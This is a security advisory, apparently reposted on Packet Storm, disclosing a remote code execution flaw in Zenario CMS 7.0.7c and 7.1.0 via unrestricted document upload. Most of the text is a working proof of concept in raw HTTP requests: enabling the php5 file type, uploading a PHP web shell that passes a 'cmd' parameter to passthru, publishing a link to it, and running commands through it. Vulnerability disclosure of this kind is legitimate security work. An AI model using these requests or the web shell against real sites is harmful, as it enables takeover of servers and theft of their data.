what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Zenario CMS 7.0.7c Remote Code Execution

Zenario CMS 7.0.7c Remote Code Execution
Posted Nov 18, 2015
Authored by LiquidWorm | Site zeroscience.mk

Zenario CMS versions 7.0.7c and 7.1.0 and below suffer from a remote code execution vulnerability.

tags | exploit, remote, code execution
SHA-256 | 5f5fa492d07b379d353348483114df240fb9fd248fc6a68f0cf87fbfd453f295

Zenario CMS 7.0.7c Remote Code Execution

Change Mirror Download

Zenario CMS 7.0.7c Remote Code Execution Vulnerability


Vendor: Tribal Ltd.
Product web page: http://www.zenar.io
Affected version: <= 7.0.7c and 7.1.0 (svn)

Summary: Zenario is a web-based content management system for sites
with one or many languages. It's designed to grow with your site,
adding extranet, online database and custom functionality when you
need it.

Desc: The vulnerability is caused due to the improper verification
of uploaded files via the Document upload script using 'Filedata' POST
parameter which allows of arbitrary files being uploaded in '/public/downloads/'
following a publicaly generated link for access where the admin first
needs to add the file extension in the allowed list. This can be exploited
to execute arbitrary PHP code by uploading a malicious PHP script file
and execute system commands.

Tested on: Ubuntu 14.04 LTS
PHP 5.5.9-1ubuntu4.1
Zend Engine v2.5.0
Zend OPcache v7.0.3
MySQL/5.5.37


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2015-5280
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5280.php

Vendor: http://zenar.io/zenario-707d


27.10.2015

--


----------------------
1. Add php5 file type:

GET http://192.168.0.17/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__administration/panels/file_types HTTP/1.1

POST /zenario/admin/ajax.php?_json=1&_ab=1&path=zenario_file_type HTTP/1.1
Host: 192.168.0.17
Connection: keep-alive
Content-Length: 516
Accept: text/plain, */*; q=0.01
Origin: http://192.168.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.17/zenario/admin/organizer.php?fromCID=1&fromCType=html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

_save=true&_confirm=&_box={"key":{"id":""},"tabs":{"details":{"edit_mode":{"on":1},"fields":{"type":{"current_value":"php5"},"mime_type":{"current_value":"application/octet-stream"}}}},"_sync":{"cache_dir":"ab_PBtBxW05_mPQDMgpv","password":"/L9HLsICPXzTD93VPn4Ou2Yw6HW6f4CPMFANLol7rcI=","iv":"7XoL6dLYAaMfqXgy7DfOeQ==","session":false}}


---------------
2. Upload file:

POST /zenario/ajax.php?__pluginClassName__=undefined&__path__=zenario_document_upload&method_call=handleAdminBoxAJAX HTTP/1.1
Host: 192.168.0.17
Content-Length: 458
Origin: http://192.168.0.17
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
X_FILENAME: phpinfo.php5
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUrDf3o8emcPIM8oD
Accept: */*
Referer: http://192.168.0.17/zenario/admin/organizer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

------WebKitFormBoundaryUrDf3o8emcPIM8oD
Content-Disposition: form-data; name="id"

12
------WebKitFormBoundaryUrDf3o8emcPIM8oD
Content-Disposition: form-data; name="fileUpload"

1
------WebKitFormBoundaryUrDf3o8emcPIM8oD
Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php5"
Content-Type: application/octet-stream

<?php
echo "<pre>";
passthru($_GET['cmd']);
echo "</pre>";
?>
------WebKitFormBoundaryUrDf3o8emcPIM8oD--



------------------------
3. Save and verify file:

POST /zenario/admin/ajax.php?_json=1&_ab=1&path=zenario_document_upload&id=12 HTTP/1.1
Host: 192.168.0.17
Content-Length: 530
Accept: text/plain, */*; q=0.01
Origin: http://192.168.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.17/zenario/admin/organizer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

_save=true&_confirm=&_box={"key":{"id":"12","fileUpload":1},"tabs":{"upload_document":{"edit_mode":{"on":1},"fields":{"document__upload":{"_display_value":"phpinfo.php5","current_value":"~79fa169880192652f933c1834aae09f40c4fc39c~2Fphpinfo.php5"}}}},"_sync":{"cache_dir":"ab_uMwuijj5_YP_0GAuZ","password":"/NUErtsIJtkXJXJqRr0pbt8oqAIUqz0GVdjJung5J/4=","session":false}}


------------------------
3. Generate public link:

POST /zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX HTTP/1.1
Host: 192.168.0.17
Content-Length: 28
Accept: text/plain, */*; q=0.01
Origin: http://192.168.0.17
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.17/zenario/admin/organizer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35

id=27&generate_public_link=1


----------------
3. Execute code:

GET http://192.168.0.17/zenario/public/downloads/RvoId/phpinfo.php5?cmd=id;pwd HTTP/1.1
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close